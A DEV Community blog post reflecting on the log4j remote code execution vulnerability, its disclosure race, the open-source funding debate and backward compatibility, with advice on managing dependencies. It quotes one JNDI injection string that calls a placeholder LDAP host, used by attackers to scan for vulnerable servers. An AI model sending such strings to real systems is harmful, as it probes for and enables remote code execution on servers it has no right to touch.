DEV Community

Cover image for The Fallout From log4j and What We Can Learn From It
Andy Kofod for Leading EDJE

Posted on

The Fallout From log4j and What We Can Learn From It

By now most people who work in software or IT have heard about the vulnerability in log4j that was disclosed last week. This has resulted in a high stakes race between IT teams trying to update and patch their vulnerable systems and hackers trying to find easy targets to exploit with the new vulnerability. The resulting fallout has brought up a lot of very interesting issues that bear discussion.

The Details, Briefly

If you're not familiar, log4j is an open-source logging framework for Java that's maintained by Apache. It's one of the most popular dependencies downloaded from the Maven repository. Released in January of 2001, it's nearly as old as Java itself, and is used in thousands of projects around the world.

The vulnerability itself has been reported on pretty heavily over the past few days, so I'll just summarize quickly. If an application logs any information directly from the user, such as chat messages, username or email changes, etc., an attacker could potentially format a message that would use the Java Naming and Directory Interface (JNDI) to load and execute code from a remote server. This type of vulnerability is commonly known as a Remote Code Execution (RCE) vulnerability.

So What's the Big Deal?

RCE vulnerabilities are certainly not a rare occurrence. A quick search of the CVE database shows at least 100 other vulnerabilities reported this year that mention RCEs, so why is the log4j vulnerability getting so much attention?

That's what makes this whole situation so interesting. First of all, it's an extremely popular library that's used by thousands of projects from the smallest hobby web apps, to huge enterprise solutions. It's used in the servers of Minecraft, one of the best-selling video games of all time. It's a dependency of numerous, major, software vendors including AWS, IBM, Cisco, Okta, and VMWare.

This alone makes it a significant issue, but what makes it even worse is how easy this vulnerability is to exploit. A correctly formatted message, and a remote server to host the attack payload is all that's needed to gain root access to the log4j host server. The following is an example of the messages being seen by Cloudflare following the disclosure of the vulnerability:

${jndi:ldap://x.x.x.x/#Touch}
Enter fullscreen mode Exit fullscreen mode

This is a simple example that's being used to scan for potential targets. If a server is vulnerable, a request will be sent to x.x.x.x/#Touch, letting the attacker know that the target is vulnerable to the attack. A follow-up message can then be sent to exploit the vulnerability. For more details on how the vulnerability works, check out this excellent write-up from Cloudflare.

The Disclosure Conundrum

This brings us to the first thing I found interesting about this situation. log4j is a pretty old framework, and this bug is not new. According to the Cloudflare article referenced above, it was introduced in 2013. Apparently, it went unnoticed until it was first disclosed to Apache on November 24th, by security researchers at Alibaba. It wasn't publicly disclosed until December 9th, after Apache had time to create release 2.15.0 to address the issue. And the race was on.

IT teams around the world immediately began rushing to update their servers with the fixed release. At the same time, attackers started scanning the internet for vulnerable servers. Cloudflare reports that they began seeing a ramp up of blocked attacks the day after the disclosure, peaking at 20,000 requests per minute, with between 200 and 400 IPs attacking at any given time.

And that's the conundrum. Disclosing a vulnerability, especially one that's easy to exploit and so wide spread, is bound to trigger this kind of race between the attackers and defenders, and it's interesting to watch. It seems pretty clear that this disclosure was new to attackers. Various reports from security researchers have been tracking the progress of organized groups on the dark web as they rush to develop new exploits.


There's a small window of time for them to hit the "low hanging fruits" before they're patched. There will of course continue to be organizations that don't patch right away, either because they can't (due to complexity, backwards compatibility, etc.) or because they don't know they have a vulnerable dependency in their codebase.

Now, I'm not suggesting that there was anything wrong with the disclosure. Alibaba's team did the right thing by reporting it to the log4j team, and giving them time to create a patch before disclosing it publicly. This is exactly how responsible disclosures should go. Maybe it's because this vulnerability has gotten so much attention, but I've found it very interesting to watch this "race" take place in real-time. I think the real lesson here is that organizations need to be prepared for this type of event. Know your dependencies, and know how you're going to upgrade them when you need to, especially when time is not on your side. If your systems are too complex to make this type of upgrade easily, it may be time to re-evaluate your architecture.

The Paying for Open-Source Debate

Another interesting thing to come out of this incident is the re-emergence of the old arguments about whether enterprise companies should be paying to support the open-source projects they depend on. I always find this debate interesting, and I don't have a strong opinion on the issue, but I see merit to both sides.

In one camp you have those that argue that these large enterprise organizations are taking advantage of open-source projects without any support for the developers. This group argues that if the developers were paid for their work maintaining open-source projects, they'd have more time to dedicate to preventing vulnerabilities, as well as adding new features. On the other hand, you have some who claim, as David Crawshaw points out, that paying for open-source software probably wouldn't have helped to prevent this bug. In fact, it may be these enterprise users that kept this bug from being fixed previously. According to one of the maintainers of log4j, the team didn't like this feature, but weren't able to remove it due to backward compatibility concerns (we'll come back to this in a minute).

I love the idea of open-source software, and it would be great if it's maintainers could get paid to keep it going, but how does that help to prevent vulnerabilities like this from sneaking in? I think it's clear from the numerous vulnerabilities found in paid software, that this kind of bug can easily sneak in, paid or not, but this topic seems to spring up any time a vulnerability is found in a widely used open-source project. I don't have an answer for the paid vs. open-source debate, but I will say this: If you're using third-party software in your applications, it's on you to make sure you understand what it's doing and have reviewed the code for vulnerabilities. If you can't confidently say that your software, including it's dependencies, is secure, then you shouldn't be shipping it.

Back to the Backward Compatibility

Okay, circling back to the thing I mentioned a minute ago about backward compatibility. This is another interesting aspect of this incident. It appears that the maintainers were at least aware that the JNDI plugin was a potential problem, but their requirements to maintain backwards compatibility prevented them from removing it. I understand the desire to maintain backward compatibility, and I'm sure this is a major issue with the number of users the log4j library has, but I also believe that open-source teams need to feel empowered to do what needs to be done, even if it means a little extra work for their users. This is especially true for security issues. Yes, removing the JNDI feature may have broken the library for some users. There would have been some grumbling as developers figured out how to modify their implementations to work with the new version. But, those same developers would probably have preferred that over finding out on a Friday afternoon that you have a critical security vulnerability that has to be fixed right now.

Final Thoughts

It's been interesting to watch this event unfold, and it's got me thinking about a lot of different issues. I'll leave you with this:

  • If you have a 3rd party dependency in your codebase, or if you're using 3rd party software, this will happen to you at some point. It doesn't matter if it's paid or open-source, there will be a vulnerability. Hopefully, it won't be as bad as this one, but it will happen.
  • When it happens, you need to be ready to update any and all dependencies at a moments notice. Invest in building out pipelines to make these kind of changes quick and painless. You don't want to end up in a race with the hackers.
  • If you're using a 3rd party library, do your due diligence. Read the code. Have other developers read the code. Treat it like a code review for your own products. If it's not code that you'd accept from your own team, then don't put it in your project.

I'd like to say this event is over, but it's just getting started. Most of the big players have patched their systems by now, but there will be stragglers, and I'm sure there are some big players that have already been hit. We probably won't see those disclosures for a couple of weeks yet. I think Marc Rogers sums it up pretty well.


Smart EDJE Image

Top comments (0)